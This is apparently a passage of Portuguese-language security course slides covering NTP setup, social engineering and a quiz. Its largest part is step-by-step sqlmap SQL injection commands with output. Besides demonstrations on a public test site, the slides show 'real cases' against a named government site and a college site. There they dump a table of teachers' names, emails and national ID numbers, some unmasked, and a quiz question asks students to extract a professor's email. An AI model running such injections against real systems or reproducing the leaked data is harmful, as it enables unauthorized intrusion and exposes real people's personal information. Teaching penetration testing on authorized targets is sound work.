atualização do relógio, para que, se houver queda de comunicação
com os servidores, o horário se mantenha correto. Ou, se for
necessário reiniciar o serviço NTP, ele toma o valor armazenado neste
arquivo como inicial, mantendo o horário correto até a próxima
sincronização.
■ statsdir :: diretório de logs do serviço.
■ restrict :: politicas de acesso ao serviço.
■ server :: servidores para sincronização de horário.
Reinciando o serviço
# /etc/init.d/ntp restart
Sincronizando:# apt-get update; apt-get install ntpdate
# ntpdate ip_ou_nome_do_servidor
Petisco p/ próximo módulo - Pentest
sqlmap - http://sqlmap.org/
dependência: python
Download:git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
./sqlmap.py -h
sqlmap - exemplo1/sqlmap.py --url "http://testphp.
vulnweb.com/listproducts.php?cat=1" -b
---
[09:55:38] [INFO] the back-end DBMS is MySQL[09:55:38] [INFO] fetching banner
web application technology: Nginx, PHP 5.3.10back-end DBMS operating system: Linux Ubuntuback-end DBMS: MySQL 5.0banner: '5.1.69-0ubuntu0.10.04.1'
./sqlmap.py --url "http://testphp.
vulnweb.com/listproducts.php?cat=1" --
current-db
--
[09:58:40] [INFO] fetching current databasecurrent database: 'acuart'
sqlmap - exemplo1/sqlmap.py --url "http://testphp.
vulnweb.com/listproducts.php?cat=1" -b
---
[09:55:38] [INFO] the back-end DBMS is MySQL[09:55:38] [INFO] fetching banner
web application technology: Nginx, PHP 5.3.10back-end DBMS operating system: Linux Ubuntuback-end DBMS: MySQL 5.0banner: '5.1.69-0ubuntu0.10.04.1'
./sqlmap.py --url "http://testphp.
vulnweb.com/listproducts.php?cat=1" --
current-db
--
[09:58:40] [INFO] fetching current databasecurrent database: 'acuart'
-b: banner do DBMS
–current-db: Mostra o banco de dados atual.
sqlmap - exemplo1./sqlmap.py --url "http://testphp.vulnweb.
com/listproducts.php?cat=1" --dbs
--
[10:00:44] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema
./sqlmap.py --url "http://testphp.vulnweb.
com/listproducts.php?cat=1" -D acuart --tables
--
[10:04:59] [INFO] fetching tables for database:
'acuart'
Database: acuart
[8 tables]
+-----------+| artists | | carts | | categ |
| featured | | guestbook | | pictures | | products ||
users | +-----------+
–dbs: Lista os bancos de dados do DBMS–url: Url do alvo.-D:banco de dados alvo.–tables:lista as tabelas.-D o sqlmap iria listar todas as tabelas de todos os bancos de dados..
sqlmap - exemplo1./sqlmap.py --url "http://testphp.vulnweb.
com/listproducts.php?cat=1" -D acuart -T users
--columns
--
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| address | mediumtext |
| cart | varchar(100) |
| cc | varchar(100) |
| email | varchar(100) |
| name | varchar(100) |
| pass | varchar(100) |
| phone | varchar(100) |
| uname | varchar(100) |
+---------+--------------+
–url:URL Alvo.-D:Banco de dados alvo.-T:Tabela alvo.–columns:Listar colunas.
sqlmap - exemplo1./sqlmap.py --url "http://testphp.vulnweb.
com/listproducts.php?cat=1" -D acuart -T users
-C 'uname,pass' --dump
Database: acuart
Table: users
[1 entry]
+------+-------+
| pass | uname |
+------+-------+
| test | test |
+------+-------+
–url: URL alvo.-D:Banco de dados alvo.-T:Tabela do Alvo.-C: Colunas do alvo–dump: Extrair informações.
sqlmap - exemplo1./sqlmap.py --url "http://testphp.
vulnweb.com/listproducts.php?cat=1" -D
acuart --tables --dump-all
Extrair tudo de todas as tabelas.
sqlmap - exemplo2
sqlmap - exemplo2
sqlmap - exemplo2
sqlmap - exemplo2
sqlmap - Caso real 1 (Governo)
python sqlmap.py --url http://www.casaruibarbosa.gov.br/interna.php?ID_S=387 --current-db
python sqlmap.py --url http://www.casaruibarbosa.gov.br/interna.php?ID_S=387 current-db -D site_fcrb --tables
python sqlmap.py --url http://www.casaruibarbosa.gov.br/interna.php?ID_S=387 -T tb_usuarios --columns
python sqlmap.py --url http://www.casaruibarbosa.gov.br/interna.php?ID_S=387 -T tb_usuarios -C 'nm_login, id_login' --dump
sqlmap - Caso real 2 (Inst. de Ensino)
python sqlmap.py --url http://www.fasul.edu.br/caaf/evento_exibe.php?id=381 --current-db
python sqlmap.py --url http://www.fasul.edu.br/caaf/evento_exibe.php?id=381 -D portal --tables
python sqlmap.py --url http://www.fasul.edu.br/caaf/evento_exibe.php?id=381 -T ce_docente --columns
sqlmap - Caso real 2 (Inst. de Ensino)
web server operating system: Linux CentOS 6.3web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0.11current database: 'portal'[115 tables]+-------------------------------------+| auth_certificado_usuario_assinatura || auth_operacao || auth_permissao || auth_permissao_operacao || auth_projeto || auth_usuario || auth_usuario_permissao || caaf_artigo || caaf_artigo_categoria || caaf_artigo_subcategoria |
Database: portal Table: ce_docente[6 columns]+----------+--------------+| Column | Type |+----------+--------------+| cpf | varchar(15) || created | datetime || email | varchar(80) || id | int(11) || modified | datetime || nome | varchar(100) |+----------+--------------+
sqlmap - Caso real 2 (Inst. de Ensino)
Table: tcc_docentes[732 entries]+------------+----------------+--------------------------------------------------+--------------------------------------------------+---------------------+---------------------+------------+| id | cpf | nome | email | created | modified | titulacao |+------------+----------------+--------------------------------------------------+--------------------------------------------------+---------------------+---------------------+------------+| 107 | 546.546.546-54 | L A P | po*l@fasul.edu.br | 2010-12-16 11:44:18 | 2010-12-16 11:44:18 | Grad. || 1000003153 | 041.061.639-77 | J** R** L** | j.l@fasul.edu.br | 2011-01-04 03:40:04 | 2013-11-04 03:40:01 | Ms. || 1000003176 | 00*.8*6.3*9-3* | U* R* C* | u.c@fasul.edu.br | 2012-09-20 15:23
Engenharia SocialNo-Tech Hacking
Kevin Mitnick● Definindo Engenharia Social
Confiança● Medo● Reciprocidade● Amizade● Respeito● Dever moral● Ganância● Ignorância
Baseada em humanos
Baseada em computadores
PERGUNTAS
1. Qual email do Prof Jéfer cadastrado na base de dados da Fasul?
2. Qual o SO e o SGBD do site governamental http://www.casaruibarbosa.gov.br/? e o da FAG?
3. Cite 5 normas da ISO 27002 que foram atendidas até o momento, citando o que foi implementado para atendê-la.
4. Como é possível, apenas com a ferramenta PING descobrir o possível SO de uma máquina remota?
5. Qual a importância da hora sempre correta para o sistema de LOGs?
Questões de Múltipla escolha1) Uma boa definição para Hardening é:Escolher uma resposta.a. Petrificar o sistema.b. A mesma coisa que um Firewall.c. Trancar o servidor em uma sala cofre.d. Melhor o Hardware do servidor.e. Ajuste fino no sistema.
2) Com procedimentos de Hardening, podemos deixar o sistema 100% seguro. Essa afirmacão é falsaou verdadeira?
3) Por que é recomendado que o /home fique em uma partição separada?Escolher uma resposta.a. Para quando precisar reinstalar o sistema, não perca as informações que estão no /home.b. Para um usuário ter o seu próprio diretório pessoal.c. Porque é obrigatório o /home ficar em uma partição separada.d. Porque o /home precisa ser uma partição primária.e. Com o /home separado, o sistema fica mais rápido.
4) Antes da norma ISO/IEC 27002:2005 se chamar por esse nome, como ela era conhecida?Escolher uma resposta.a. ISO/IEC 27002:2004b. ISO/IEC 17799:2005c. ISO/IEC 27001:2005d. ISO/IEC 12345:2005e. ISO/IEC BS7799
5) A impossibilidade de se prever as necessidades de espaço para cada partição é uma desvantagemquando falamos de particionamento de disco. Essa afirmação é verdadeira ou falsa?Resposta:Verdadeiro Falso
Desafio:http://www.hackertest.net
Jogos:Hacker Evolution Uplink
Jéfer Benedett Dörr
Até a próxima!
13/12/2013
3.1-OSSTMM – Open Source Security Testing Methodology Manual.
3.2-Anatomia de um Ataque,
3.3-Engenharia Social,
3.4-Footprint,
3.5-Footprint emSMTP,
3.6-Fingerprint,
3.7-Levantamento de Dados Através de Port Scanners,
3.8-Técnicas de Varreduras,
3.9-Técnicas Furtivas,
14/12/2013
4.1-Captura de Informações com Sniffers,4.2-Conceitos Básicos de Backdoors,
4.3-Enumeração de Serviços e Informações,
4.4 - Bruteforce,4.5 - Negação de Serviço,
4.6 - Exploits,
4.7 - Google Hacking,
4.8 - Ferramentas,
4.9 - Contramedidas.
Referências e Links
http://www.pentest-standard.org/index.php/Main_Page
http://backtracktutorials.com/backtrack-basics/scanning/
http://www.faqs.org/docs/securing/
ISO 73:2009 - Gerenciamento de Risco
ISO 27001
ISO 27002
Livros
Recommended